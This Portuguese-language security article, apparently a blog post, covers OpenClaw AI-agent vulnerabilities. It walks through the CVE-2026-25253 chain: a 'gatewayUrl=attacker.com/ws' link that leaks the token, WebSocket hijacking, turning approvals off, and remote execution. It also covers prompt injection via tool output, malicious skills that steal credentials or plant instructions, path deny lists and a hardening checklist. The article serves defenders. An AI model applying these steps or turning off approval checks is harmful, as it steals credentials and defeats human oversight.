Contexto: O Risco Acumulado num Agente Autónomo
O OpenClaw não é "mais uma app viral". É um agente autónomo com permissões sobre ficheiros, terminal, email e calendários — cada uma destas capacidades representa um vector de ataque independente que, quando combinado, cria uma superfície de ataque exponencialmente maior do que qualquer ferramenta convencional.
Desde Janeiro de 2026, o projecto acumulou mais de 100.000 utilizadores activos e 5.700+ skills no ClawHub. Essa escala tornou-o alvo prioritário para investigadores de segurança e actores maliciosos. A sequência de advisories divulgados em Maio confirma o que especialistas como CrowdStrike e Cisco vinham a alertar: um agente comprometido não se limita a exfiltrar dados — continua a executar objectivos do atacante pela infraestrutura sem intervenção humana.
CVE-2026-25253 (CVSS 8.8): Timeline e Detalhes Técnicos
A vulnerabilidade CVE-2026-25253, classificada como CWE-669 (Transferência Incorrecta de Recursos Entre Esferas), foi descoberta pelo investigador Mav Levin da firma DepthFirst. A timeline de divulgação é reveladora:
- Janeiro 2026: Descoberta da falha e report responsável à equipa OpenClaw
- 29 de Janeiro: Patch silencioso integrado na v2026.1.29 — sem advisory público nem menção no changelog
- 3 de Fevereiro: The Register publica investigação sobre problemas de segurança no ecossistema
- 5 de Fevereiro: DepthFirst publica divulgação completa com PoC (Proof of Concept)
- 17 de Maio: Publicação de três advisories adicionais de alto impacto pelo GitHub Security Lab
O facto de o patch ter sido inicialmente silencioso — integrado sem advisory formal — levantou críticas na comunidade de segurança. Instâncias que não actualizaram automaticamente permaneceram vulneráveis durante semanas sem saber que existia uma correcção disponível.
O Vector de Ataque: 4 Fases em Milissegundos
A cadeia de exploração do CVE-2026-25253 é particularmente perigosa pela sua simplicidade — requer apenas que a vítima visite um link malicioso:
Fase 1 — Injecção de gatewayUrl
O Control UI do OpenClaw aceita um parâmetro gatewayUrl via query string e grava-o no localStorage sem validação. Um link como ?gatewayUrl=attacker.com/ws força a aplicação a enviar o token de autenticação para o servidor do atacante através da conexão WebSocket.
Fase 2 — Cross-Site WebSocket Hijacking (CSWSH)
O servidor WebSocket do OpenClaw não validava o header origin, aceitando conexões de qualquer domínio. JavaScript malicioso no browser da vítima abria conexões para ws://localhost:18789 — funcional mesmo em instâncias configuradas apenas para loopback.
Fase 3 — Escape de Sandbox via Scopes Privilegiados
O token roubado continha scopes operator.admin e operator.approvals. Com estes privilégios, o atacante desactivava confirmações do utilizador (exec.approvals.set = "off") e forçava execução directa na máquina host (tools.exec.host = "gateway"), ultrapassando o contentor Docker.
Fase 4 — Execução Remota de Código Arbitrário
Através de node.invoke com system.run, o atacante executa qualquer comando bash com os privilégios do processo OpenClaw. Resultado: controlo total da máquina, acesso a API keys, dados pessoais e potencial para movimentação lateral na rede.
Os Três Advisories de Alto Impacto (Maio 2026)
Para além do CVE-2026-25253, a equipa publicou em Maio três advisories adicionais que expõem vectores complementares:
| Advisory | Vector | Impacto |
|---|---|---|
| GHSA-g8p2-7wf7-98mq | Injecção de comandos via tool output não sanitizado | Execução arbitrária quando o agente processa resposta de ferramenta maliciosa |
| GHSA-3xc9-rr7f-vq62 | Fuga de tokens em transcrições de sessão | Credenciais expostas em logs partilhados ou exportados |
| GHSA-hjv8-6w4p-q4mm | Path traversal em file operations do agente | Leitura/escrita arbitrária fora do directório de trabalho autorizado |
A combinação destes vectores cria uma cadeia de ataque sistémica: uma skill maliciosa no ClawHub pode injectar comandos via tool output (GHSA-g8p2), que por sua vez escala privilégios e acede a ficheiros fora do scope (GHSA-hjv8), expondo tokens que ficam gravados em transcrições não sanitizadas (GHSA-3xc9).
Skills Maliciosas no ClawHub: O Risco Sistémico
O ClawHub é o marketplace central de extensões do OpenClaw. Com mais de 5.700 skills registadas, investigadores da Koi Security identificaram 341 skills com comportamento malicioso, incluindo:
- Exfiltração de criptomoeda: Skills que modificam endereços de carteiras em transacções
- Roubo de credenciais: Extensões que capturam API keys durante a execução e enviam para servidores externos
- Prompt injection persistente: Skills que injectam instruções invisíveis no contexto do agente, alterando o seu comportamento futuro
- Backdoors silenciosos: Código que abre conexões reversas para C2 (Command and Control) após instalação
O problema é estrutural: ao contrário de um package manager como o npm (que pelo menos tem assinaturas e checksums), o ClawHub operou durante meses sem verificação automatizada de código. A parceria com VirusTotal Code Insight anunciada em Fevereiro foi um primeiro passo, mas a cobertura ainda não é completa para padrões de ataque específicos de agentes de IA.
A Amplificação: Porque um Agente com Shell, Email e Calendário É Diferente
A diferença fundamental entre comprometer uma aplicação web tradicional e comprometer um agente autónomo como o OpenClaw reside na capacidade de acção encadeada. Um agente comprometido pode:
Acesso a ficheiros: Ler configurações, chaves SSH, .env files, cookies de browser e qualquer ficheiro acessível ao utilizador do processo
Execução de shell: Instalar persistência (crontabs, launch agents), modificar ficheiros de sistema, criar túneis de rede, movimentar-se lateralmente
Acesso a email: Enviar mensagens em nome do utilizador, exfiltrar correspondência confidencial, propagar ataques de engenharia social
Acesso a calendários: Mapear a organização, identificar reuniões sensíveis, inserir eventos falsos para phishing
Como alertou a CrowdStrike, um agente comprometido em ambiente corporativo transforma-se num "backdoor de IA automatizado" que executa ordens de adversários sem necessidade de interacção contínua — é, na prática, um APT (Advanced Persistent Threat) com capacidades de raciocínio.
Medidas de Hardening: O Que Já Foi Implementado e Proposto
Apesar da gravidade, o projecto OpenClaw tem respondido com propostas concretas de hardening. As medidas dividem-se em já implementadas e em desenvolvimento:
Redaction de Transcrições (Implementado)
As transcrições de sessão passam agora por um pipeline de redaction que detecta e mascara automaticamente padrões de API keys, tokens, passwords e outros segredos antes de serem gravadas em disco ou exportadas. Endereça directamente o advisory GHSA-3xc9.
Deny Lists por Caminho (Implementado)
O agente mantém agora uma lista de caminhos proibidos (~/.ssh, ~/.gnupg, ~/.aws, ficheiros .env, etc.) que não podem ser lidos nem escritos, independentemente das instruções recebidas. Mitiga o path traversal do advisory GHSA-hjv8.
Confiança por Binário (Em Desenvolvimento)
Proposta de um sistema de assinaturas criptográficas para skills e binários executados pelo agente. Apenas código assinado por publishers verificados poderá ser executado em modo privilegiado. Semelhante ao modelo de code signing do macOS Gatekeeper.
Detecção de Prompt Injection em Tool Output (Em Desenvolvimento)
Um classificador dedicado que analisa respostas de ferramentas antes de as passar ao LLM, detectando tentativas de injecção de instruções maliciosas. Endereça o advisory GHSA-g8p2 e o vector de skills maliciosas que manipulam o contexto do agente.
Validação de Origin no WebSocket (Implementado)
O servidor WebSocket valida agora o header origin de todas as conexões e apresenta um modal de confirmação para URLs de gateway desconhecidos. Correcção directa do vector principal do CVE-2026-25253.
O Que Fazer Agora: Checklist para Operadores
Se operas uma instância de OpenClaw — seja para uso pessoal, profissional ou empresarial — estas são as acções prioritárias:
- Actualiza para v2026.1.29 ou superior — verifica com
openclaw --version - Revoga e regenera todos os tokens — gateway, API keys de LLM, integrações OAuth
- Verifica que a autenticação do gateway está activa — não confies apenas no bind a localhost
- Audita as skills instaladas — remove qualquer extensão que não reconheças ou que não tenha sido verificada
- Corre o agente em Docker — nunca directamente no host, especialmente em máquinas com acesso a redes corporativas
- Não exponhas o Control UI à internet — usa VPN, Tailscale ou Cloudflare Tunnel
- Activa deny lists de caminho — confirma que
~/.ssh,~/.awse ficheiros.envestão protegidos - Monitoriza logs do gateway — procura conexões WebSocket de origins inesperados
Perspectiva: O OpenClaw É Seguro?
A resposta honesta é: é tão seguro quanto a configuração que lhe aplicares. O projecto tem respondido com correcções rápidas e propostas ambiciosas de hardening — a redaction de transcrições, deny lists e detecção de prompt injection são medidas que muitos concorrentes comerciais ainda não implementaram.
Mas a superfície de ataque inerente a um agente com acesso a shell, ficheiros e comunicações é fundamentalmente diferente da de uma aplicação web tradicional. Exige uma abordagem de zero trust: cada permissão deve ser explicitamente concedida, cada skill deve ser auditada, cada instância deve ser isolada.
O futuro do projecto passa pelo sistema de confiança por binário e pela detecção de injecção em tool output — quando implementados, estes mecanismos colocarão o OpenClaw numa posição significativamente mais robusta. Até lá, a responsabilidade recai sobre os operadores.
🔒 Protege a Tua Instância
Consulta o nosso guia completo de segurança, verifica os advisories oficiais e mantém a tua instalação actualizada. A segurança de um agente autónomo é uma responsabilidade contínua.